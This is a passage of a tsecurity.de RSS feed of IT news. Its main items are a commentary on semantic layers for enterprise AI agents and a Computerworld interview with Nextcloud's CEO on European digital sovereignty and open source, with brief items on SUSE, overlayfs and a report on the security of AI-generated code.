<p>“Well-crafted semantic layers bring a level of context and intention that empower AI, processes, and people,” he says. “Enterprises of a significant scale often have a diverse set of data stores and systems that can’t easily interact or share consistent meaning without considerable complexity and expenditure. True semantic layers unify these data stores and their meaning in a powerful network effect.”</p>



<p>The key here is Ben’s emphasis on well-crafted and true, which set a high bar that most enterprise implementations have historically struggled to clear. Technology is rarely the hardest hurdle. Organizations often have conflicting definitions as to what counts as revenue or a customer. Cross-functional alignment is essential and is where most semantic layer initiatives stall, long before the architecture is drawn up.</p>



<h2 class="wp-block-heading">The vendor land-grab</h2>



<p>Every major data platform has spent the past 18 months reframing itself around a semantic layer for AI. Microsoft’s Fabric IQ, launched at Ignite in November 2025, is positioned as the semantic foundation for enterprise AI. Databricks shipped Unity Catalog Metric Views and wired its Genie agent directly into them. Snowflake’s Cortex Analyst sits on native Semantic Views, Salesforce launched Tableau Semantics to feed Agentforce, and dbt Labs open-sourced MetricFlow at Coalesce 2025 to power agentic workflows.</p>



<p>But through their experience specifying and deploying large data platforms, CIOs will understand that universal is doing a lot of work in the marketing of these vendors’ offerings. Most of these products are <a href="https://www.cio.com/article/4080581/20-ai-workflow-tools-for-adding-intelligence-to-business-processes.html?utm=hybrid_search">BI-era</a> semantic models with agentic veneers, and originally built to feed human-readable dashboards, not provide the dynamic, real-time context that autonomous agents demand. A semantic layer designed to power a clean Tableau dashboard will likely buckle under the unpredictable, non-linear requests of an agent stack.</p>



<p>The Open Semantic Interchange (OSI), launched in September 2025 by Snowflake, Salesforce, dbt, BlackRock, Alation, and others has the potential to address these issues. Yet OSI is still in early development, and major players including Microsoft and SAP haven’t signed up. The standards war is a long way from being won.</p>



<h2 class="wp-block-heading">Why pilots don’t scale</h2>



<p><a href="https://www.mckinsey.com/capabilities/mckinsey-technology/our-insights/building-the-foundations-for-agentic-ai-at-scale" rel="nofollow">McKinsey’s 2026 research</a> on agentic AI tells an increasingly familiar story about AI deployment roadblocks. Nearly two-thirds of enterprises have piloted agents, but fewer than 10% have scaled them, and around 80% cite data limitations as the core problem.</p>



<p>The constraint is not raw data availability, as large enterprises have more data than they can use. It’s the absence of shared meaning across it, which is exactly the gap a semantic layer can solve. Enterprises are rightly nervous about exposing that context to autonomous agents without semantic-aware guardrails. This is the problem with the BI-era semantic layer underneath most pilots, as it was designed for a different job entirely.</p>



<h2 class="wp-block-heading">What CIOs should demand</h2>



<p>Should CIOs buy the universal pitch? Not yet, but they should invest in metric governance and one well-defined semantic model where AI is touching customers or revenue. The main problem is overcoming vested interests within the enterprise, and focusing on the customer, the most important element for any business, will help build a strong foundation for the future.</p>



<p>Also, demand <a href="https://www.cio.com/article/4152095/how-effective-are-semantic-hubs-in-moving-agentic-ai-forward.html?utm=hybrid_search">OSI alignment</a> from vendors. Portability is the only thing that turns a feature into infrastructure, and it’s the easiest thing to lose if you don’t ask for it up front.</p>



<p>Then apply Clinch’s test to whatever product you’re considering. Does it actually unify meaning across your diverse data estate, or does it only generate network effects within a single platform?</p>



<p>Gartner’s 2030 prediction may well come true, but only if the OSI effort succeeds, the hyperscaler land-grab is constrained, and enterprises do the unglamorous organizational work of agreeing what their data means. The test, in the meantime, is the one Clinch sets, which asks if the layer in front of you carries context and intention across the estate. So treat universal as a forecast, not yet a fact.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nextcloud CEO: Open source moves from ‘a nerdy audience’ to the geopolitical stage]]></title>
<description><![CDATA[MUNICH — Amid trans-Atlantic political and trade tensions, digital sovereignty — once a relatively niche concern — has jumped to the top of the agenda for European organizations wary of their reliance on US technology suppliers.



For many, including European Union policy makers, increased use o...]]></description>
<link>https://tsecurity.de/de/3598357/it-nachrichten/nextcloud-ceo-open-source-moves-from-a-nerdy-audience-to-the-geopolitical-stage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598357/it-nachrichten/nextcloud-ceo-open-source-moves-from-a-nerdy-audience-to-the-geopolitical-stage/</guid>
<pubDate>Mon, 15 Jun 2026 09:32:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>MUNICH — Amid trans-Atlantic political and trade tensions, digital sovereignty — once a relatively niche concern — has <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">jumped to the top of the agenda for European organizations</a> wary of their reliance on US technology suppliers.</p>



<p>For many, including European Union policy makers, increased use of open source software is a <a href="https://www.computerworld.com/article/4115567/eu-looks-to-bolster-its-open-source-sector-to-counter-us-cloud-dominance.html">key part of the answer</a>, offering an alternative to proprietary platforms from a handful of large US vendors.</p>



<p>That’s the view of Frank Karlitschek, CEO of Nextcloud, the German software vendor that bills itself as an open-source alternative to software suites from the likes of Microsoft and Google. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Nextcloud-Summit_Frank-Karlitschek-2026-0441.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Nextcloud CEO Frank Karlitschek" class="wp-image-4184629" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Nextcloud CEO Frank Karlitschek speaking at the German software company’s Nextcloud Summit 2026.</p>
</figcaption></figure><p class="imageCredit">Nextcloud</p></div>



<p>Karlitschek founded the company in 2016, forking OwnCloud’s open-source file-sharing software. Since then, Nextcloud has expanded its products to include a range of productivity and collaboration tools that organizations can install and run on their own servers or access <a href="https://www.computerworld.com/article/4064116/a-european-alternative-to-m365-nextcloud-looks-to-capitalize-on-digital-sovereignty-interest.html">via cloud providers</a>. </p>



<p>More recently, Nextcloud helped develop the Euro-Office application suite, which <a href="https://www.computerworld.com/article/4178807/open-source-euro-office-productivity-suite-to-launch-june-9.html">launched last week</a> as an open source alternative to Microsoft Office and others, and continues to <a href="https://www.computerworld.com/article/4183069/nextcloud-adds-euro-office-to-hub-workplace-suite-expands-ai-assistant.html">build out its Nextcloud Hub</a> with AI assistant and agent features. The company now says revenues are growing at between 50% to 100% year over year.</p>



<p><em>Computerworld</em> spoke to Karlitschek at <a href="https://nextcloud.com/summit/" data-type="link" data-id="https://nextcloud.com/summit/" target="_blank" rel="noreferrer noopener">Nextcloud Summit</a> about momentum around digital sovereignty, the European Commission’s <a href="https://www.computerworld.com/article/4181816/eu-takes-first-steps-to-reduce-reliance-on-us-hyperscalers.html">Tech Sovereignty Package proposals</a>, and how Nextcloud hopes to evolve in the coming years.</p>



<p>The following interview was edited for length and clarity.</p>



<p><strong>When Nextcloud launched, there was a big push in Europe away from on-premise software towards US cloud providers. How have attitudes towards open source and awareness of alternatives providers changed since then? “</strong>I’ve been doing open source since the ‘90s; at the time it was mostly for a nerdy audience — a very small group of people who really care about software and being in control. The sovereignty part was always there. It’s the core idea behind open source that you can understand what the software is doing, you can deploy it wherever you want, you can study it and change it, and so on. </p>



<p>“At the time, it was very niche, and since then it’s really growing and growing. There are certain points in time that really accelerated the growth; something like the Snowden revelations, for example, or the whole discussion about GDPR and certain legislation. And then, of course, the current geopolitical situation.  </p>



<p>“I personally find it interesting that it grew from something that is just interesting for software developers, and now it’s on the geopolitical stage. I have meetings with big politicians who really care about it now, and I personally find it interesting that it’s increasingly understood by — I wouldn’t say the mainstream, but more and more people.</p>



<p>“At the beginning of Nextcloud, we mostly talked with IT managers looking for a solution; they care about how it works, the price and other things. But now we are also talking with the C-level people. It’s part of an overall strategy of a company, to say, ‘Hey, we need to look into the dependencies, we want to have a solution that fits into the strategy of the company.’</p>



<p>“In the past, it was like a commodity – it’s just some software, who cares? Now, it’s really part of the company strategy. That’s really interesting.”</p>



<p><strong>There’s been a lot of interest around digital sovereignty over the past couple of years. To what degree is this translating into action, with organizations migrating away from US cloud providers? “</strong>The interest is gigantic. Everybody’s talking about it, we have so many contacts and people coming to us. Not everybody is doing it — a lot of people are just exploring and seeing what the options are. </p>



<p>“Obviously, we hope that this will translate into actions in a few months. At the moment, it’s a lot of talking and exploring the options. As a company, we are also growing a lot in customer base.  But the interest in this space is even bigger; we see it as the beginning of a funnel.</p>



<p>‘In defense we see a lot of interest, then also everything around education is very important for us, then other regulated markets like the healthcare, for example. Finance is an interesting one.”</p>



<p><strong>A lot of the conversations around digital sovereignty are tied to the current geopolitical situation and even the US administration. Do you see demand for sovereign technology as a structural change or are some organizations holding back to see how the situation improves in the future? “</strong>I see it as a long-term trend. If you look at the IT budgets and projects in the ‘90s, it was some something unimportant. It was, of course, important that the printer works and the fax machine works, but it was not definitely not strategic for the company. </p>



<p>“And then in 2000, the whole cloud trend came up, and there was the big hope that this will save money. It was always the narrative with cloud computing that you can just outsource it and save money and it’s great. </p>



<p>“Nowadays, people realize that it’s not something that you can just ignore. I wouldn’t say that everything comes back on premise, but people care about it now. They understand it’s not just a commodity, like water, or electricity that comes out of the wall and you don’t care what’s behind it. People realize that it’s something that has an impact on the future of an organization, from a vendor lock-in perspective, from a cost perspective, from an industry espionage perspective, and competitiveness. With open source, you’re more flexible. So, I think the trend that this is all more strategic and important for the future, this will go on.”</p>



<p><strong>The European Commission recently published its Tech Sovereignty Package, including its open source strategy. Are these proposals sufficient to address the concern around digital sovereignty and support the open source ecosystem in Europe?</strong></p>



<p><strong>“</strong>It’s great, I really like it. I was actually surprised they listened so well. But now the real challenge is to actually do it; this still needs to happen. The description of the problem and a possible solution, this is all very good. I’m surprised, I’m happy about it, but to put this into actually binding law, this still needs happen.”</p>



<p><strong>Would you like to see any changes to the current proposals before they’re gets passed into legislation? “</strong>At the moment, they have these four different risk levels, and the most critical one — No. 4 — is one where they accept only open source and European solutions. This is the highest risk level, but this is only for 1% of the market. I hope that it’s better understood that more than 1% should care about this more.</p>



<p>“If you have something which is completely not critical, maybe doesn’t possess any personal data at all — sure, it’s totally fine [to use non-EU suppliers]. But if you have GDPR requirements, espionage protection, no vendor lock-in, and so on, then there should be more of that [the highest requirement level].”</p>



<p><strong>US firms have attempted to address European customers’ concerns in different ways, with sovereign marketed cloud services and joint ventures with European providers. Microsoft 365 Local is designed to run on premise. Where do you draw the line between what’s actually a sovereign solution and what some call ‘sovereignty washing? “</strong>Sovereignty has different dimensions, of course. But if you look at the problem of the CLOUD Act alone, which gives foreign agencies full access to the data here, then the whole idea that it’s enough to have European data centers — that’s not enough. It’s clearly written in the CLOUD Act, that even with [European] data centers, or subsidiaries, it still applies.  </p>



<p>“Microsoft tries to find a solution there with its Delos idea; a company that is owned by SAP — a German company — and Microsoft delivers only the software. But even then, you have this dependency, because software needs updates and software security updates. And if they’re not available, or if someone puts a backdoor into the software, which is possible, then you still have a problem. </p>



<p>“So, they’re trying really, really hard to find a way around the problem, but it’s not easy for them.”</p>



<p><strong>To look ahead a bit in terms of the product strategy, there were announcements for Nextcloud Hub this week around AI agents, and the program to work with independent software vendors. What do these say about Nextcloud’s future? “</strong>The overall product strategy will not change so much; it’s about having state-of-the-art collaboration software — but with a lot more control, security and safety — that’s open source and independent where you host it. So this will always stay, but of course, there’s some additional factors that come into play now, like the AI impact that we see and want to leverage with our agent strategy. </p>



<p>“We’ve had this for one and a half years already, but we are expanding that. In the future, you might still use an interface in a classic way that you open documents and type in text and so on. But there are also a lot of operations that can be automated in the future with AI. And this is something we really invest a lot into. </p>



<p>“Another aspect of AI is how easy it is to build custom software around it. The coding models are getting better all the time, which means there will be more and more custom business software. This is what we want to capture with our ISV program. Software development will become easier, but you don’t want to deploy just random software in your company, you want to have something that is tested, certified and secured, and that somebody’s accountable for it. This can be something we can provide at Nextcloud.”</p>



<p><em>Editor’s note: NextCloud paid for Matthew Finnegan’s travel and hotel costs for NextCloud Summit 2026, but had no editorial role in the creation of this story.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The New AI Computing Stack: A Guide for Tech Leaders to Navigate Shifting Power Dynamics]]></title>
<description><![CDATA[Key Takeaways AI isn’t a feature you bolt onto your existing infrastructure, but something driving an entirely new computing architecture. According to the Forrester report, the traditional three-category vendor landscape (software, cloud, services) has expanded to eight distinct provider categor...]]></description>
<link>https://tsecurity.de/de/3596476/unix-server/the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596476/unix-server/the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics/</guid>
<pubDate>Sun, 14 Jun 2026 05:31:05 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key Takeaways AI isn’t a feature you bolt onto your existing infrastructure, but something driving an entirely new computing architecture. According to the Forrester report, the traditional three-category vendor landscape (software, cloud, services) has expanded to eight distinct provider categories. A new five-layer AI computing stack is forming across experience, orchestration, data, intelligence and infrastructure. […]</p>
<p>The post <a href="https://www.suse.com/c/the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics/">The New AI Computing Stack: A Guide for Tech Leaders to Navigate Shifting Power Dynamics</a> appeared first on <a href="https://www.suse.com/c">SUSE Communities</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] An overlayfs update]]></title>
<description><![CDATA[In a shortened session in the filesystem track at the 2026 Linux Storage,
Filesystem, Memory Management, and BPF Summit, Amir Goldstein gave an
update on the overlayfs
union filesystem.  There are some new features over the last few years
that he wanted to mention, along with looking at the statu...]]></description>
<link>https://tsecurity.de/de/3594423/linux-tipps/an-overlayfs-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594423/linux-tipps/an-overlayfs-update/</guid>
<pubDate>Fri, 12 Jun 2026 21:39:45 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In a shortened session in the filesystem track at the 2026 <a href="https://events.linuxfoundation.org/lsfmmbpf/">Linux Storage,
Filesystem, Memory Management, and BPF Summit</a>, Amir Goldstein gave an
update on the <a href="https://docs.kernel.org/filesystems/overlayfs.html">overlayfs
union filesystem</a>.  There are some new features over the last few years
that he wanted to mention, along with looking at the status of nesting
overlayfs layers.  The <a href="https://lwn.net/Articles/922851/">composefs use case</a>
that was <a href="https://lwn.net/Articles/933616/">discussed at the summit in 2023</a>
has led to some interesting changes to overlayfs.]]></content:encoded>
</item>
<item>
<title><![CDATA[SIG report: AI-generated code is linked to twice the security risk and rising technical debt]]></title>
<description><![CDATA[AI-supported coding has progressed from experimental to the norm in organizations, yet technical debt, security risks, and costs could be piling up much faster than anyone realizes. This is one of the key takeaways from the Software Improvement Group (SIG) 2026 State of Software report, which ana...]]></description>
<link>https://tsecurity.de/de/3591800/it-security-nachrichten/sig-report-ai-generated-code-is-linked-to-twice-the-security-risk-and-rising-technical-debt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591800/it-security-nachrichten/sig-report-ai-generated-code-is-linked-to-twice-the-security-risk-and-rising-technical-debt/</guid>
<pubDate>Thu, 11 Jun 2026 22:53:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI-supported coding has progressed from experimental to the norm in organizations, yet technical debt, security risks, and costs could be piling up much faster than anyone realizes. This is one of the key takeaways from the Software Improvement Group (SIG) 2026 State of Software report, which analyzed more than 30,000 software systems and more than [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[SIG report: AI-generated code is linked to twice the security risk and rising technical debt]]></title>
<description><![CDATA[AI-supported coding has progressed from experimental to the norm in organizations, yet technical debt, security risks, and costs could be piling up much faster than anyone realizes. This is one of the key takeaways from the Software Improvement Group (SIG)…
Read more →
The post SIG report: AI-gen...]]></description>
<link>https://tsecurity.de/de/3591772/it-security-nachrichten/sig-report-ai-generated-code-is-linked-to-twice-the-security-risk-and-rising-technical-debt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591772/it-security-nachrichten/sig-report-ai-generated-code-is-linked-to-twice-the-security-risk-and-rising-technical-debt/</guid>
<pubDate>Thu, 11 Jun 2026 22:36:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AI-supported coding has progressed from experimental to the norm in organizations, yet technical debt, security risks, and costs could be piling up much faster than anyone realizes. This is one of the key takeaways from the Software Improvement Group (SIG)…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/sig-report-ai-generated-code-is-linked-to-twice-the-security-risk-and-rising-technical-debt/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/sig-report-ai-generated-code-is-linked-to-twice-the-security-risk-and-rising-technical-debt/">SIG report: AI-generated code is linked to twice the security risk and rising technical debt</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,39ms -->